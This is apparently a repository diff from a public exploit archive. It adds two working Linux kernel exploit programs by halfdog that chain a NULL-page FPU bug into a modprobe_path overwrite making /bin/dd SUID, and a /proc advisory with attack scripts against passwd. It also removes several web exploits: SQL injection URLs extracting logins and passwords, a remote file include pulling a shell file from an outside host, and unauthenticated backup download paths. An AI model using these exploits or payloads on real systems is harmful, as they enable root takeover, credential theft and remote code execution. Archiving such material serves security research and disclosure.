sigAction.sa_sigaction=handleSignal;
sigfillset(&sigAction.sa_mask);
sigAction.sa_flags=SA_SIGINFO;
sigAction.sa_restorer=NULL;
sigaction(SIGILL, &sigAction, NULL); // 4
sigaction(SIGFPE, &sigAction, NULL); // 8
sigaction(SIGSEGV, &sigAction, NULL); // 11
sigaction(SIGALRM, &sigAction, NULL); // 14
realMem=mmap((void*)0x10000, realMemSize, PROT_EXEC|PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
if(realMem==(void*)-1) {
fprintf(stderr, "Failed to map real-mode memory space\n");
return(1);
}
result=readFully(randomFd, realMem, realMemSize);
if(result!=realMemSize) {
fprintf(stderr, "Failed to read random data\n");
return(0);
}
write(1, &result, 4);
write(1, realMem, realMemSize);
while(1) {
runTest(realMem);
result=readFully(randomFd, realMem, 0x1000);
write(1, &result, 4);
write(1, realMem, result);
}
}
--- EOF ---
--- FpuStateTaskSwitchShmemXattrHandlersOverwriteWithNullPage.c ---
/** This software is provided by the copyright owner "as is" and any
* expressed or implied warranties, including, but not limited to,
* the implied warranties of merchantability and fitness for a particular
* purpose are disclaimed. In no event shall the copyright owner be
* liable for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
*
* Copyright (c) 2014 halfdog <me (%) halfdog.net>
*
* This progam maps a NULL page to exploit a kernel NULL-dereferences,
* Usually that will not work due to sane /proc/sys/vm/mmap_min_addr
* settings. An unhandled FPU error causes part of task switching
* to fail resulting in NULL-pointer dereference. This can be
* used to add 0xffff0001 to an arbitrary memory location, one
* of the entries in shmem_xattr_handlers is quite suited because
* it has a static address, which can be found in System.map.
* Another tool (ManipulatedXattrHandlerForPrivEscalation.c)
* could then be used to invoke the xattr handlers, thus giving
* local root privilege escalation.
*
* gcc -o FpuStateTaskSwitchShmemXattrHandlersOverwriteWithNullPage FpuStateTaskSwitchShmemXattrHandlersOverwriteWithNullPage.c
*
* See http://www.halfdog.net/Security/2013/Vm86SyscallTaskSwitchKernelPanic/ for more information.
*/
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <unistd.h>
static const char *DEDICATION="To the most adorable person met so far.";
int main(int argc, char **argv) {
int childPid;
int sockFds[2];
int localSocketFd;
int requestCount;
int result;
// Cleanup beforehand to avoid interference from previous run
asm volatile (
"emms;"
: // output (0)
:
:
);
childPid=fork();
if(childPid>0) {
mmap((void*)0, 1<<12, PROT_EXEC|PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
// down_write just adds 0xffff0001 at location offset +0x6c of
// the memory address given below. shmem_xattr_handlers handlers are
// at 0xc150ae1c and contain two valid handlers, terminated by
// a NULL value. As we are lucky, the value after NULL is 1, thus
// adding 0xffff0001 shmem_xattr_handlers + 0x6c + 0xa will turn
// the NULL into 0x10000 and the following 1 into NULL, hence
// the handler list is terminated correctly again.
*((int*)0x8)=0xc150adba;
result=socketpair(AF_UNIX, SOCK_STREAM, 0, sockFds);
result=fork();
close(sockFds[result?1:0]);
localSocketFd=sockFds[result?0:1];
asm volatile (
"emms;"
: // output (0)
:
:
);
fprintf(stderr, "Playing task switch ping-pong ...\n");
// This might be too short on faster CPUs?
for(requestCount=0x10000; requestCount; requestCount--) {
result=write(localSocketFd, sockFds, 4);
if(result!=4) break;
result=read(localSocketFd, sockFds, 4);
if(result!=4) break;
asm volatile (
"fldz;"
"fldz;"
"fdivp;"
: // output (0)
:
:
);
}
close(localSocketFd);
fprintf(stderr, "Switch loop terminated\n");
// Cleanup afterwards
asm volatile (
"emms;"
: // output (0)
:
:
);
return(0);
}
usleep(10000);
// Enable FPU exceptions
asm volatile (
"fdivp;"
"fstcw %0;"
"andl $0xffc0, %0;"
"fldcw %0;"
: "=m"(result) // output (0)
:
:"%eax" // Clobbered register
);
// Terminate immediately, this seems to improve results
return(0);
}
--- EOF ---
--- ManipulatedXattrHandlerForPrivEscalation.c ---
/** This software is provided by the copyright owner "as is" and any
* expressed or implied warranties, including, but not limited to,
* the implied warranties of merchantability and fitness for a particular
* purpose are disclaimed. In no event shall the copyright owner be
* liable for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
*
* Copyright (c) 2014 halfdog <me (%) halfdog.net>
*
* This progam prepares memory so that the manipulated shmem_xattr_handlers
* (see FpuStateTaskSwitchShmemXattrHandlersOverwriteWithNullPage.c)
* will be read from here, thus giving ring-0 code execution.
* To avoid fiddling with task structures, this will overwrite
* just 4 bytes of modprobe_path, which is used by the kernel
* when unknown binary formats or network protocols are requested.
* In the end, when executing an unknown binary format, the modified
* modprobe script will just turn "/bin/dd" to be SUID, e.g. to
* own libc later on.
*
* gcc -o ManipulatedXattrHandlerForPrivEscalation ManipulatedXattrHandlerForPrivEscalation.c
*
* See http://www.halfdog.net/Security/2013/Vm86SyscallTaskSwitchKernelPanic/ for more information.
*/
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
static const char *DEDICATION="To the most adorable person met so far.";
int main(int argc, char **argv) {
void *handlerPage;
int *handlerStruct;
void *handlerCode;
char *modprobeCommands="#!/bin/sh\nchmod u+s /bin/dd\n";
int result;
handlerStruct=(int*)0x10000;
handlerPage=mmap((void*)(((int)handlerStruct)&0xfffff000), 1<<12,
PROT_EXEC|PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
if(handlerPage==(void*)-1) {
fprintf(stderr, "Failed to map handler page\n");
return(1);
}
fprintf(stderr, "Handler page at %p\n", handlerPage);
*handlerStruct=(int)(handlerStruct+0x10); // Prefix pointer
strcpy((char*)(handlerStruct+0x10), "system"); // Prefix value
handlerCode=(void*)(handlerStruct+0x100);
*(handlerStruct+0x2)=(int)handlerCode; // list
*(handlerStruct+0x3)=(int)handlerCode; // get
*(handlerStruct+0x4)=(int)handlerCode; // set
// Switch the modprobe helper path from /sbin to /tmp. Address is
// known from kernel version's symbols file
memcpy(handlerCode, "\xb8\xa1\x2d\x50\xc1\xc7\x00tmp/\xc3", 12);
result=getxattr("/run/shm/", "system.dont-care", handlerPage, 1);
fprintf(stderr, "Setattr result: 0x%x, error %d (%s)\n", result,
errno, strerror(errno));
result=open("/tmp/modprobe", O_RDWR|O_CREAT, S_IRWXU|S_IRWXG|S_IRWXO);
write(result, modprobeCommands, strlen(modprobeCommands));
close(result);
// Create a pseudo-binary with just NULL bytes, executing it will
// trigger the binfmt module loading
result=open("/tmp/dummy", O_RDWR|O_CREAT, S_IRWXU|S_IRWXG|S_IRWXO);
memset(handlerPage, 0, 1<<12);
write(result, handlerPage, 1<<12);
close(result);
*(int*)handlerPage=(int)"/tmp/dummy";
execve("/tmp/dummy", handlerPage, NULL);
return(0);
}
--- EOF ---

44
platforms/linux/local/41770.txt Executable file
View file

@ -0,0 +1,44 @@
Source: http://www.halfdog.net/Security/2011/SuidBinariesAndProcInterface/
# proc Handling of Already Opened Files: Subvert The Stack Base Address Randomization With Suid-Binaries
Problem description: Latest ubuntu lucid stock kernel (2.6.32-27-generic) contains a bug that allows to keep attached to open /proc file entries as lower privileged user even after the process is executing suid binary. By doing that, a malicous user might draw information from the proc interface or even modify process settings of privileged process.
Monitor syscalls, syscall stack, limits of running suid-binaries: A simple helper program (ProcReadHelper.c) is sufficient to open a proc entry before executing a suid program and keep it open. (SyscallReadExample.sh):
#!/bin/bash
(./ProcReadHelper /proc/$$/syscall) &
sleep 1
exec /usr/bin/passwd
Output:
Read 69 bytes:
7 0xffffffff 0xbff646ac 0x0 0x0 0xf4d 0xbff646c8 0xbff64654 0x64b422
Changing password for test.
(current) UNIX password: Read 69 bytes:
3 0x0 0xbffb4a84 0x1ff 0x0 0xbffb4a84 0xbffb4d18 0xbffb4814 0xf30422
Read 69 bytes:
3 0x0 0xbffb4a84 0x1ff 0x0 0xbffb4a84 0xbffb4d18 0xbffb4814 0xf30422
The same can be done with /proc/[pid]/stack or /proc/[pid]/limits, where one can see how passwd increases its limits to unlimited after invocation.
Modify core dump flags of running suid-binaries: Since proc is also writeable, the same technique can be used to modify open proc files, e.g. adjust the coredump filter of a currently running passwd program (ModifyCoreDumpFilter.sh):
#!/bin/bash
echo "Current pid is $$"
(sleep 10; echo 127 ) > /proc/$$/coredump_filter &
sleep 5
exec /usr/bin/passwd
Some open proc files can only be written by the process itself, e.g. /proc/[pid]/mem, a limitation that could be circumvented if any suid-binary echos out command line/input file/environment data, e.g. sudoedit -p xxx /etc/sudoers echos xxx. If /procc/[pid]/mem would be writeable on standard linux kernels, this program should give local root privilege escalation (SeekHelper.c), e.g. ./SeekHelper /proc/self/mem 8048000 /usr/bin/sudoedit -p xxx /etc/sudoers with a crafted address and promt payload. Currently something else is still blocking in kernel, could be fs/proc/base.c:
static ssize_t mem_read(struct file * file, char __user * buf,
size_t count, loff_t *ppos) {
...
if (file->private_data != (void*)((long)current->self_exec_id))
goto out_put;
Inject faults using oom_adjust: Some programs, e.g. from the shadow suite, try to disable all signals and limits to assure that critical code is not interrupted, e.g. modification of /etc/shadow when a unprivileged user changes his password. Since this program creates a lock file, interruption via oom_kill could leave stale lockfiles and so impede functionality.
test@localhost:~/Tasks/LowMemoryProgramCrashing$ cat OomRun.sh
#!/bin/bash
(sleep 3; echo 15) > /proc/$$/oom_adj &
exec /usr/bin/passwd

261
platforms/multiple/dos/41778.cc Executable file
View file

File diff suppressed because one or more lines are too long

35
platforms/php/webapps/11951.txt
View file

@ -1,35 +0,0 @@
========================================================================================
| # Title : E-book Store Mullti Vulnerability
| # Author : indoushka
| # email : indoushka@hotmail.com
| # Home : www.iqs3cur1ty.com
| # Web Site :
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
| # Bug : Mullti
====================== Exploit By indoushka =================================
# Exploit :
1- Backup Dump
http://localhost/ebookstore/admin/backups/ (2 Find Backup File)
2- If you don't find a buckup stor thisis how to Creat And Download Backup fil SQl
http://127.0.0.1/ebookstore/admin/backup.php/login.php?action=backup
http://127.0.0.1/ebookstore/admin/backup.php/login.php?action=backupnow
to download backup :http://127.0.0.1/ebookstore/admin/backup.php/login.php?action=download&file=db_ebookstore-20100301222138.sql
db_ebookstore-20100301222138.sql chang it to the name of the backup and download it with opera 10.10 + Mozilla Firefox Or IDM
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
---------------------------------------------------------------------------------------------------------------

2
platforms/php/webapps/12857.txt
View file

@ -86,7 +86,7 @@ FILE NAME:<br>
<input type="text" name="filename">  (ex. shell.php)<br>FILE CONTENTS:<br>
<textarea name="file_contents" wrap="soft" cols="70" rows="10">&lt;/textarea&gt;
<textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea>
<input name="submit" type="submit" value=" Save " >

13
platforms/php/webapps/17641.txt
View file

@ -1,13 +0,0 @@
Title : LASERnet CMS Vulnerable to SQL Injection
Vendor : http://lasernet.gr/cms.php
Dork : intext:"Powered by Lasernet"
Category: WebApps
http://localhost.com/index.php?id=[SQL]
Demo:
http://localhost.com/index.php
?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+

9
platforms/php/webapps/28915.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/20929/info
Article Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Article Script 1.6.3 and prior versions are vulnerable to this issue.
http://www.example.com/articles/rss.php?category=-1/**/union/**/select/**/1,2,login,password/**/from/**/users/*

9
platforms/php/webapps/31532.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/28437/info
Clever Copy is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Clever Copy 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/path/postview.php?ID='+union+select+username,concat(0x706173737764,char(58),password,0x2D2D2D,0x757365726E616D653ADA,username),1,5,username,username,6,username,username,9,username+from+cc_admin/*

9
platforms/php/webapps/33444.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/37498/info
DrBenHur.com DBHcms is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
DBHcms 1.1.4 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?dbhcms_core_dir=http://www.example.org/shell.txt%00

0
platforms/windows/local/41721.c → platforms/win_x86-64/local/41721.c
View file

0
platforms/windows/local/41722.c → platforms/win_x86-64/local/41722.c
View file